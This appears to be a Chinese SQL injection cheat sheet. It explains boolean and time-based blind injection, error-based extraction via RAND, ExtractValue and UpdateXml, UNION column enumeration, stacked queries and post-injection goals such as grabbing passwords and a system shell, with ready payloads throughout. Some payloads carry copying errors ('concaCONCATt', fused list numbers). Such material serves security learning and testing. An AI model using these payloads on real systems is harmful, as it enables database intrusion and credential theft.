盲注
关键点是 根据页面返回内容分析 Payload 中的问题是否为真,然后通过多次测试遍历出想要的数据
布尔盲注
目标地址:http://newspaper.com/items.php?id=2
对应的SQL语句:SELECT title, description, body FROM items WHERE ID = 2
然后攻击者尝试返回 false 的查询:http://newspaper.com/items.php?id=2 and 1=2
对应的SQL语句:SELECT title, description, body FROM items WHERE ID = 2 and 1=2
如果网页应用存在 SQL 注入漏洞,那么其可能不会返回数据。为了确认这一点,攻击者会再次注入一次返回 true 的查询:http://newspaper.com/items.php?id=2 and 1=1
如果前后两次查询返回的网页内容不同,攻击者就能够通过组合 Payload 遍历出想要的数据。
时间盲注猜测密码的首字符是否为 ‘2’,是的话等待10秒。
对应 MySQL 语句为 1 UNION SELECT IF(SUBSTRING(user_password,1,1) = CHAR(50),BENCHMARK(5000000,ENCODE('MSG','by 5 seconds')),null) FROM users WHERE user_id = 1;
报错注入完整的语句如 SELECT * FROM xxx WHERE id=1 AND ({Payload}),{Payload} 详细内容见下文
关键点是 构造错误信息,让自己想要的数据被输出到错误信息中
RAND
SELECT COUNT(*), CONCAT((SELECT @@version),0x3a,FLOOR(RAND(0)*2)) x FROM information_schema.tables GROUP BY x
RAND(0) 0为随机函数的种子,该函数产生浮点数v,且v的范围为 0 <= v < 1.0
FLOOR(X) 取不大于 X 的最大整数
FLOOR(RAND(0)*2) 返回 0 或 1
0x3a 是 “:” 的 Unicode,单纯为了拼接好看
CONCAT() 拼接字符串
GROUP BY 按拼接字符串分组
COUNT(*) 记录的总数,这里会阻止 GROUP BY 直接优化得到 0 和 1 的结果
结合以上内容,当 FLOOR(RAND(0)*2) 出现重复值时,数据库会报错,报错信息类似 Error: Duplicate entry ‘5.1.73-0ubuntu0.10.04.1:1’ for key ‘group_key’
这样我们就可以从报错信息中获取到我们想要的信息,这次是数据库版本。
rand 的结果是随机的,也可以选择以下两种函数来构造错误信息。
ExtractValue
Description: 查询 XML 文档的函数
Payload: ExtractValue(1,CONCAT(0x7e,(SELECT version()),0x7e))
Output: - XPATH syntax error: '~5.5.53~'
UpdateXml
Description: 修改 XML 文档的函数
Payload: UpdateXml(1,concaCONCATt(0x7e,(SELECT user()),0x7e),1)
Output: - XPATH syntax error: '~5.5.53~'
UNION 查询注入UNION 语句合并多个 SELECT 语句的结果并返回
关键点:UNION 连接的多个 SELECT 语句中,每一列的数据类型应该相同,且选中相同数量的列。对于 Oracle 数据库,还要求 SELECT 必须使用 FORM 指定一个有效的表名。
确定列的数量使用 ORDER BY
依次使用以下序列中的语句,直到报错,如 The ORDER BY position number 3 is out of range of the number of items in the select list,进而确认列的数量。
1
2
31 ORDER BY 1--
1 ORDER BY 2--
1 ORDER BY 3--
使用 UNION SELECE NULL,...
NULL 可以被转为任意数据类型,所以这里可以用来作为返回值。
依次使用以下序列中的语句,直到报错,如 All queries combined using a UNION, INTERSECT or EXCEPT operator must have an equal number of expressions in their target lists,进而确认列的数量。
1
2
31 UNION SELECT NULL--
1 UNION SELECT NULL,NULL--
1 UNION SELECT NULL,NULL,NULL--
找到字符串类型的列
同样的,可以依次尝试以下序列:
1
2
3
41 UNION SELECT 'a',NULL,NULL,NULL--
1 UNION SELECT NULL,'a',NULL,NULL--
1 UNION SELECT NULL,NULL,'a',NULL--
1 UNION SELECT NULL,NULL,NULL,'a'--
如果对应的列与字符串类型不兼容,就会报错,如 Conversion failed when converting the varchar value ‘a’ to data type int ,所以如果不报错,我们就找到了字符串类型的列。
覆盖原有数据
注入点一般在 WHERE 处,使用 1 AND false UNION SELECT ... 将原有输出覆盖。
堆叠注入
堆叠注入指的是被注入方允许同时执行多条语句,那么攻击者就可以利用额外的语句完成任何操作。
敏感数据
成功注入后,接下来的流程一般是:
获取当前用户/数据库
获取用户名和密码
枚举数据库/表/列
尝试获取系统 shell
结合利用其他漏洞
Reference